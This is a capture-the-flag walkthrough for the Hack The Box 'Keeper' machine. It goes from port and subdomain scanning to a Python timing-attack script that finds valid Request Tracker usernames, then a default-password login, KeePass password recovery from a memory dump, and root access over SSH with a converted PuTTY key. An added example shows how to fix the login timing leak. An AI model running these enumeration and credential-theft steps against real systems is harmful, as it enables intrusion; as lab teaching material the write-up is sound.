Keeper
Enum
nmap -Pn -sC -sV 10.10.11.227 -oN scans/nmap.initial
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-14 19:51 IST
Nmap scan report for 10.10.11.227
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.13 seconds
nmap -Pn -p- 10.10.11.227 -oN scans/nmap.allports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-14 20:28 IST
Nmap scan report for tickets.keeper.htb (10.10.11.227)
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 29.96 seconds
curl -i http://10.10.11.227
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 14 Aug 2023 18:51:59 GMT
Content-Type: text/html
Content-Length: 149
Last-Modified: Wed, 24 May 2023 14:04:44 GMT
Connection: keep-alive
ETag: "646e197c-95"
Accept-Ranges: bytes
<html>
<body>
<a href="http://tickets.keeper.htb/rt/">To raise an IT support ticket, please visit tickets.keeper.htb/rt/</a>
</body>
</html>
curl -I http://tickets.keeper.htb
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: RT_SID_tickets.keeper.htb.80=e109010be5f40cc76fe51ad8cd372f60; path=/rt; HttpOnly
Date: Mon, 14 Aug 2023 18:54:37 GMT
Cache-control: no-cache
Pragma: no-cache
X-Frame-Options: DENY
ffuf \
-c \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
-u "http://keeper.htb" \
-H "Host: FUZZ.keeper.htb" -mc all -fs 149
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://keeper.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.keeper.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 149
________________________________________________
[Status: 200, Size: 4236, Words: 407, Lines: 154, Duration: 46ms]
* FUZZ: tickets
:: Progress: [19966/19966] :: Job [1/1] :: 1234 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
So that’s running Best Practical Request Tracker version 4.4.4.
CVE-2021-38562
Best Practical Request Tracker (RT) 4.2 before 4.2.17, 4.4 before 4.4.5, and 5.0 before 5.0.2 allows sensitive information disclosure via a timing attack against lib/RT/REST2/Middleware/Auth.pm.
https://docs.bestpractical.com/release-notes/rt/4.4.5
This one was fixed in 4.4.5; most of the other ones were already fixed in 4.4.4, or don’t seem very useful.
Side channel attack
Searching for "timing attack" on ippsec.rocks, I found a video demonstrating how to do time-based side-channel attacks in Python, so I wrote this script, taking inspiration from it:
import requests


def check_user(username):
    """Post one login attempt for `username` and return how long the
    server took to answer, in microseconds. On this box, accounts that
    exist answer noticeably slower than accounts that don't."""
    url = "http://tickets.keeper.htb/rt/NoAuth/Login.html"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "RT_SID_tickets.keeper.htb.80="
                  "33ea3d15db846fcd0ac8006b0eb5e7c7",
    }
    payload = f"user={username}&pass=asdf"
    res = requests.post(url, headers=headers, data=payload)
    # total_seconds() instead of .microseconds: the latter only holds the
    # sub-second part and wraps around for replies slower than one second
    return int(res.elapsed.total_seconds() * 1_000_000)


if __name__ == "__main__":
    with open(
        "/usr/share/seclists/Usernames/"
        "cirt-default-usernames.txt",
        # "top-usernames-shortlist.txt",
        "r"
    ) as f:
        usernames = f.read().splitlines()

    for user in usernames:
        user = user.lower().strip()
        if not user:
            continue
        time = check_user(user)
        # anything slower than ~0.4 s is flagged as a probable valid account
        if time > 400000:
            print(f"{time} - \x1b[32m{user}\x1b[0m")
python3 side-channel.py
516635 - root
522913 - root
406899 - root
Now that I know root is a valid user, I just tried a few passwords, and simply "password" worked.
A few seconds of poking around the portal later, we find the lnorgaard Unix username and password.
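To see why a login form leaks valid usernames through timing, here is an added example (not code from this post or from Request Tracker) with a constructed account store: a login that returns early for unknown users beside one that does the same hashing work on both paths. The account names, passwords, decoy credential and PBKDF2 parameters are all made up.

```python
import hashlib
import hmac
import os
import time

ROUNDS = 100_000  # PBKDF2 iterations; slow on purpose, like any password hash


def pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)


# Constructed account store (username -> (salt, verifier)); stands in for the
# ticketing system's user table. Only "root" exists, as on the box.
SALT = os.urandom(16)
ACCOUNTS = {"root": (SALT, pbkdf2("correct horse battery", SALT))}
# Fixed decoy credential so the "no such user" path costs the same as a hit.
DECOY_SALT = os.urandom(16)
DECOY = (DECOY_SALT, pbkdf2("decoy", DECOY_SALT))


def leaky_login(user: str, password: str) -> bool:
    """Early return on unknown users: no hash is computed, so the reply comes
    back far faster than for a real account. This is the shape of side channel
    the script above measures."""
    if user not in ACCOUNTS:
        return False
    salt, verifier = ACCOUNTS[user]
    return pbkdf2(password, salt) == verifier


def constant_work_login(user: str, password: str) -> bool:
    """Always hash against a real or decoy verifier, compare in constant time,
    and only then fold in whether the user exists, so both paths do equal work.
    The decoy can never authenticate because `exists` is False for it."""
    exists = user in ACCOUNTS
    salt, verifier = ACCOUNTS.get(user, DECOY)
    match = hmac.compare_digest(pbkdf2(password, salt), verifier)
    return exists and match


def timed(fn, user: str, password: str) -> tuple:
    """Return (result, elapsed seconds) for one login attempt through `fn`."""
    start = time.perf_counter()
    ok = fn(user, password)
    return ok, time.perf_counter() - start


if __name__ == "__main__":
    for fn in (leaky_login, constant_work_login):
        for user in ("root", "nobody"):
            ok, dt = timed(fn, user, "asdf")
            print(f"{fn.__name__:20s} {user:8s} ok={ok!s:5s} {dt * 1e6:10.0f} us")
```

Run it and the leaky variant answers the unknown user in microseconds versus tens of milliseconds for root, while the constant-work variant takes about the same time for both.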
Privesc with a KeePass CVE
lnorgaard@keeper:~$ sudo -l
[sudo] password for lnorgaard:
Sorry, user lnorgaard may not run sudo on keeper.
grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
lnorgaard:x:1000:1000:lnorgaard,,,:/home/lnorgaard:/bin/bash
lnorgaard@keeper:~$ id
uid=1000(lnorgaard) gid=1000(lnorgaard) groups=1000(lnorgaard)
lnorgaard@keeper:~$ ls -la
total 85384
drwxr-xr-x 4 lnorgaard lnorgaard 4096 Aug 15 01:00 .
drwxr-xr-x 3 root root 4096 May 24 16:09 ..
lrwxrwxrwx 1 root root 9 May 24 15:55 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard 220 May 23 14:43 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard 3771 May 23 14:43 .bashrc
drwx------ 2 lnorgaard lnorgaard 4096 May 24 16:09 .cache
-rw------- 1 lnorgaard lnorgaard 20 Aug 15 00:12 .lesshst
-rw------- 1 lnorgaard lnorgaard 807 May 23 14:43 .profile
-rw-r--r-- 1 root root 87391651 Aug 15 01:00 RT30000.zip
drwx------ 2 lnorgaard lnorgaard 4096 Jul 24 10:25 .ssh
-rw-r----- 1 root lnorgaard 33 Aug 14 23:43 user.txt
-rw-r--r-- 1 root root 39 Jul 20 19:03 .vimrc
I’m scp-ing that zip over to my machine; once extracted, there’s a kdbx, which is a KeePass database.
ls -la
total 247480
drwxr-xr-x 3 blnkn blnkn 4096 Aug 15 00:01 .
drwxr-xr-x 6 blnkn blnkn 4096 Aug 15 00:01 ..
-rwxr-x--- 1 blnkn blnkn 253395188 Aug 14 22:41 KeePassDumpFull.dmp
-rwxr-x--- 1 blnkn blnkn 3630 Aug 14 22:40 passcodes.kdbx
drwxr-xr-x 2 blnkn blnkn 4096 Aug 14 22:44 zip
I tried cracking it in the background, but didn’t have any luck:
keepass2john passcodes.kdbx > hash.txt
hashcat -m 13400 hash.txt /usr/share/wordlists/rockyou.txt
Looking through the dmp file with strings, there are a lot of Windows references, and after googling around a little, there’s a CVE where it’s possible to extract a KeePass password from a memory dump.
I tried the original PoC in dotnet, but the password didn’t seem to make any sense to me, so I tried another implementation of the tool in Python, and yeah, same result. So I googled around some more about those words, and it quickly started to make sense: this is Danish food stuff… haha.
python3 poc.py ~/sec/htb/machines/keeper/loot/zip/KeePassDumpFull.dmp
2023-08-14 23:21:32,532 [.] [main] Opened /home/blnkn/sec/htb/machines/keeper/loot/zip/KeePassDumpFull.dmp
Possible password: ●,d**************
Possible password: ●ld**************
Possible password: ●`d**************
Possible password: ●-d**************
Possible password: ●'d**************
Possible password: ●]d**************
Possible password: ●Ad**************
Possible password: ●Id**************
Possible password: ●:d**************
Possible password: ●=d**************
Possible password: ●_d**************
Possible password: ●cd**************
Possible password: ●Md**************
sudo apt-get install kpcli
kpcli --kdb=passcodes.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/>
Exploring the db, we find a PuTTY key pretty quickly:
kpcli:/passcodes/Network> show -f 0
Path: /passcodes/Network/
Title: keeper.htb (Ticketing Server)
Uname: root
Pass: F4********
URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AA**************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************
Private-Lines: 14
AA**************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
************************************************
Private-MAC: b0a0************************************************************
Looking through Stack Overflow, I found out that this is a ppk, which is PuTTY’s SSH key format, so we presumably just have to convert it into an OpenSSH PEM and we’re good to go.
Found a tool called puttygen, which can be installed as part of putty-tools:
sudo apt-get install putty-tools
I first tried going from PEM to ppk with a test key that I generated:
ssh-keygen -f test
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in test
Your public key has been saved in test.pub
The key fingerprint is:
SHA256:3L8/04t6lC0AXf7f92Jre2iFL0xUksdPrmzuVcHb93k blnkn@Kolossus
The key's randomart image is:
+---[RSA 3072]----+
| . .. o |
| . .. + =|
| . . O.|
| . . . o *|
| S . .oo=+|
| . +*.O|
| o=.*E|
| o&.B|
| .+B=Xo|
+----[SHA256]-----+
puttygen test -o test.ppk
And yeah, it looks exactly like what we got:
cat test.ppk
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: blnkn@Kolossus
Public-Lines: 9
Private-Lines: 21
Private-MAC: 72ae0c890cd9bbef6995546741ee2f2cf2bba0536a55fc09aaf40c63e4de3041
Translating the real one from ppk to PEM:
puttygen priv.ppk -O private-openssh -o priv.pem
Noice
ssh -i priv.pem root@keeper.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
You have new mail.
Last login: Tue Aug 15 01:12:12 2023 from 10.10.14.118
root@keeper:~#